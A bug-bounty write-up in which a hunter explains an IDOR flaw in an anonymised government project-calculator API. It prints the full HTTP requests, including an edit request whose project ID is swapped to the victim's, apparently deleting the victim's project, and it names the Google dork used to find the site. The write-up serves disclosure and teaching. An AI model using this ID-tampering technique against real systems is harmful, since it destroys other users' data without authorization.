IDOR Vulnerability allows attackers to delete any existing project.
Hello Hunters,
If you don’t know me, I’m 0xanas. I’m a junior penetration tester and bug hunter on HackerOne.
I want to tell you about my first IDOR vulnerability that I discovered, and I hope that my explanation is easy for you to understand.
What’s IDOR vulnerability?
An Insecure Direct Object Reference (IDOR) vulnerability is a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. This means that an attacker can manipulate the input to access objects that they are not authorized to access.
Now, I will explain the IDOR scenario in detail.
While hunting for a government VDP on HackerOne, I found a login page hosted on a sub-subdomain of site.org using the Google dork site:*.*.site.org. Then I created two accounts, one for the hacker and one for the victim, verified them, and then logged into both accounts. There was a function that allowed me to create a transportation project. I could save it by completing all five stages.
Victim Account
After creating and saving the project, the request was in JSON format as following.
POST /api/projects HTTP/1.1
Host: sub2.sub1.site.org
Cookie: ai_user=random_chars; OAMAuthnHintCookie=1; ai_session=random_chars; jwt=jwt_token
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain
Referer: https://sub2.sub1.site.org/calculation/5
Content-Type: application/json
Content-Length: 428
Origin: https://sub2.sub1.site.org
Connection: close
{
"name":"victim",
"address":"victim",
"formInputs":"{\"PROJECT_NAME\":\"victim\",\"PROJECT_ADDRESS\":\"victim\",\"APN\":\"2332-233-232\",\"VERSION_NO\":\"victim\",\"UNITS_CONDO\":\"24234\",\"PARK_CONDO\":\"324324\",\"PARK_SPACES\":\"3431\",\"STRATEGY_PARKING_5\":4,\"STRATEGY_AFFORDABLE\":\"2\",\"STRATEGY_MIXED_USE\":true,\"STRATEGY_INFO_2\":true,\"STRATEGY_PARKING_4\":true}",
"loginId":337,
"calculationId":1
}Then the response was also in JSON format for a project ID is:
HTTP/1.1 201 Created
Content-Length: 11
Connection: close
Content-Type: application/json; charset=utf-8
Date: Fri, 18 Aug 2023 15:33:31 GMT
Access-Control-Allow-Origin: *
ETag: W/"b-pud3ttcdoWKRmNk4a1EDs6HUPB4"
X-Powered-By: Express
{
"id":3921
}Then I could access my project through a link like thishttps://sub2.sub1.site.org/calcultion/1/3921 , The endpoint /1/ refers to the first stage of the 5-stage project, so you can edit it as you want.
Hacker Account
I created a new project using the same way that i used in Victim account and received the new project ID in JSON format in response.
{
"id":4206
}So, I tried to edit the project. When I intercepted the request using Burp Suite, I found that the project ID appeared in the request as follows:
POST /api/projects/4206 HTTP/1.1
Host: sub2.sub1.site.org
Cookie: ai_user=random_chars; OAMAuthnHintCookie=1; ai_session=random_chars; jwt=jwt_token
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain
Referer: https://sub2.sub1.site.org/calculation/5
Content-Type: application/json
Content-Length: 428
Origin: https://sub2.sub1.site.org
Connection: close
{
"name":"hacker",
"address":"hacker",
"formInputs":"{\"PROJECT_NAME\":\"hacker\",\"PROJECT_ADDRESS\":\"hacker\",\"APN\":\"2332-233-232\",\"VERSION_NO\":\"victim\",\"UNITS_CONDO\":\"24234\",\"PARK_CONDO\":\"324324\",\"PARK_SPACES\":\"3431\",\"STRATEGY_PARKING_5\":4,\"STRATEGY_AFFORDABLE\":\"2\",\"STRATEGY_MIXED_USE\":true,\"STRATEGY_INFO_2\":true,\"STRATEGY_PARKING_4\":true}",
"loginId":340,
"calculationId":1,
"id":4206
}Then I thought, “What would happen if I changed the project ID to another existing project ID from another account?” so, I changed the ID to the victim project ID, which was 3921 as follows.
POST /api/projects/4206 HTTP/1.1
Host: sub2.sub1.site.org
Cookie: ai_user=random_chars; OAMAuthnHintCookie=1; ai_session=random_chars; jwt=jwt_token
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain
Referer: https://sub2.sub1.site.org/calculation/5
Content-Type: application/json
Content-Length: 428
Origin: https://sub2.sub1.site.org
Connection: close
{
"name":"hacker",
"address":"hacker",
"formInputs":"{\"PROJECT_NAME\":\"hacker\",\"PROJECT_ADDRESS\":\"hacker\",\"APN\":\"2332-233-232\",\"VERSION_NO\":\"victim\",\"UNITS_CONDO\":\"24234\",\"PARK_CONDO\":\"324324\",\"PARK_SPACES\":\"3431\",\"STRATEGY_PARKING_5\":4,\"STRATEGY_AFFORDABLE\":\"2\",\"STRATEGY_MIXED_USE\":true,\"STRATEGY_INFO_2\":true,\"STRATEGY_PARKING_4\":true}",
"loginId":340,
"calculationId":1,
"id":3921
}Boo000m, the hacker changed his project ID from 4206to 3921, and then deleted automatically the victim’s project ID, which was also 3921.
What was the Impact from this vulnerability?
The attacker can delete any project by editing the project ID to match the victim ID.
